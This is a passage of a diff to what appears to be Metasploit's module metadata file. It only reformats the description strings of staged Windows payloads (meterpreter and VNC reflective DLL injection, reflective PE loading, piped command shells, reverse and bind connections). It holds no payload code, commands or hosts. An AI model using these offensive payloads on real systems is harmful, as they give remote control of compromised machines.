+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204616,7 +205181,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204653,7 +205218,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Connect back to the attacker with UUID Support",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204690,7 +205255,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (staged). Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -204726,7 +205291,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -204762,7 +205327,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -204797,7 +205362,7 @@
      "bwatters-r7",
      "UserExistsError"
    ],
-    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -204832,7 +205397,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Listen for a connection (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -204872,7 +205437,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -204908,7 +205473,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -204943,7 +205508,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -204980,7 +205545,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [

    ],
@@ -205015,7 +205580,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -205050,7 +205615,7 @@
      "bwatters-r7",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -205090,7 +205655,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -205126,7 +205691,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -205161,7 +205726,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [

    ],
@@ -205196,7 +205761,7 @@
      "bwatters-r7",
      "OJ Reeves"
    ],
-    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [

    ],
@@ -205231,7 +205796,7 @@
      "Matt Graeber",
      "Shelby Pace"
    ],
-    "description": "Spawn a piped command shell (staged). Connect to MSF and read in stage",
+    "description": "Spawn a piped command shell (staged).\n\nConnect to MSF and read in stage",
    "references": [

    ],
@@ -205405,7 +205970,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205442,7 +206007,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205480,7 +206045,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a pipe connection (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205517,7 +206082,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205558,7 +206123,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205595,7 +206160,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Listen for a connection with UUID Support (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205632,7 +206197,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205672,7 +206237,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205709,7 +206274,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker via a named pipe pivot",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205746,7 +206311,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205787,7 +206352,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205824,7 +206389,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205861,7 +206426,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -205898,7 +206463,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer. Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -206151,7 +206716,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -206187,7 +206752,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -206222,7 +206787,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a pipe connection (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -206257,7 +206822,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -206297,7 +206862,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -206333,7 +206898,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Listen for a connection with UUID Support (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -206368,7 +206933,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker via a named pipe pivot",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -206403,7 +206968,7 @@
      "ege <egebalci@pm.me>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -206443,7 +207008,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [

    ],
@@ -206479,7 +207044,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\n          loader will execute the pre-mapped PE image starting from the address of entry after performing image base\n          relocation and API address resolution. This module requires a PE file that contains relocation data and a\n          valid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\n          are not currently supported. Also PE files which use resource loading might crash.\n        . Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -206655,7 +207220,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
    "references": [

    ],
@@ -206690,7 +207255,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -206725,7 +207290,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
    "references": [

    ],
@@ -206759,7 +207324,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
    "references": [

    ],
@@ -206798,7 +207363,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -206833,7 +207398,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [

    ],
@@ -206867,7 +207432,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
    "references": [

    ],
@@ -206906,7 +207471,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [

    ],
@@ -206941,7 +207506,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Spawn a piped command shell (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Spawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [

    ],
@@ -207043,7 +207608,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207079,7 +207644,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207115,7 +207680,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "UserExistsError"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a pipe connection (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207150,7 +207715,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207190,7 +207755,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207226,7 +207791,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Listen for a connection with UUID Support (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207262,7 +207827,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207300,7 +207865,7 @@
      "agix",
      "rwincey"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 wininet)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207335,7 +207900,7 @@
    "author": [
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207375,7 +207940,7 @@
      "max3raza",
      "RageLtMan"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207411,7 +207976,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Connect back to the attacker with UUID Support (Windows x64)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
